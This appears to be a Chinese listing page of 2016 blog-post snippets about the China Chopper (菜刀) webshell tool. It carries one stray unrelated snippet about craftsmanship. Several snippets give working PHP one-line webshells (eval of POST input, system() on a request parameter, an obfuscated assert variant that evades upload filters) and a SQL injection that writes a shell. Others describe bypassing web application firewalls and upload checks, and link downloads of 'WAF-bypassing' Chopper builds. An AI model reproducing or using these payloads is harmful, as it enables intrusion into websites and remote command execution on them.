PHP一句话:1、普通一句话 <!--?php @eval($_POST['ki11']);?--> 2、防爆破一句话 <!--?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['ki11']);?--> //菜刀地址http:/ ...
分类:
其他好文 时间:
2016-09-05 18:59:04
阅读次数:
405
思路:上传一个“后门”,通过控制后门来得到shell,比如一句话木马。比如:<?system($_REQUEST[‘cmd‘]);?>//通过request提交,执行shell<?php@eval($_POST[‘chopper‘]);?>//PHP一句话木马,直接上菜刀这里构造如下语句:1‘and1=2unionselect"<?",system($_REQU..
分类:
数据库 时间:
2016-09-04 17:54:20
阅读次数:
364
1.可上传php文件,但是过滤了标识符 <? 以及"php"。上传1.php,内容 <script language="Php">$k="ass"."ert"; $k(${"_PO"."ST"} ['a']);</script> 菜刀连接之。 ...
分类:
其他好文 时间:
2016-09-03 21:10:21
阅读次数:
336
夜猫中国菜刀 要就下载哦!!! 无后门,强大菜刀工具 下载地址:http://pan.baidu.com/s/1gfwi8vT ...
分类:
其他好文 时间:
2016-08-06 21:44:32
阅读次数:
231
2016过狗菜刀 2016过狗刀公布 <ignore_js_op> <ignore_js_op> 过狗菜刀2016.rar (2.64 MB, 下载次数: 3) ...
分类:
其他好文 时间:
2016-08-05 11:31:07
阅读次数:
345
00x01安全狗的确是让人很头痛,尤其是在上传一句话或者写入一句话的时候,会被安全狗拦截从而拿不下shell。当然,安全狗是最简单的一款waf,很容易就进行一个绕过。00x02对于绕过安全狗跟360,我姿势不多,但是却很实用为以下两种 1.#可变变量2.#引用变量 00x03##可变变量(菜刀可能报 ...
分类:
Web程序 时间:
2016-08-01 19:27:29
阅读次数:
133
6月17号,某牛在朋友圈发了消息:
史上最牛逼的中国菜刀即将发布,过市面上所有的 waf,而且把 webshell 玩到让你瞠目结舌的境界.
当时有消息称 6 月底将会发布新版菜刀。
果不其然,在 6 月 20 日,原本已经关闭的 maicaidao.com 又开放了,而且下载量瞬间就到了 660 +。
话不多说,赶紧去下载一个体验一波到底有多牛逼。
文章...
分类:
其他好文 时间:
2016-07-25 13:12:02
阅读次数:
681
随着老罗的“锤子”、李宗盛的“致匠心”、《大圣归来》的“情怀”,『工匠精神』这个词成为新时代的“网红”。 套用财经学者吴晓波的话来讲,工匠精神就是:做电饭煲的,能让煮出来的米饭粒粒晶莹不黏锅;做吹风机的,能让头发吹得干爽柔滑;做菜刀的,能让每一个主妇手起刀落,轻松省力;做保温杯的,能让每一个出行者在 ...
分类:
其他好文 时间:
2016-07-19 13:13:52
阅读次数:
340
0x00 中国制造, 黑客之刀 中国菜刀是中国安全圈内使用非常广泛的一款Webshell管理工具,此次老兵大牛进行了更新,界面更加优美,功能更加丰富,有图有真相! 0x01 验证 此次更新还自带了官网验证功能,妈妈再也不会担心我的webshell了。 0x02 软件说明 菜刀 / Caidao @ ...
分类:
其他好文 时间:
2016-07-18 15:17:47
阅读次数:
1295
思路: 图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php 可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示, 记录下来后用菜刀连接即可。 (1)网站要求上传png格式的文件 (2)保存-抓包 ...
分类:
Web程序 时间:
2016-07-11 10:20:00
阅读次数:
624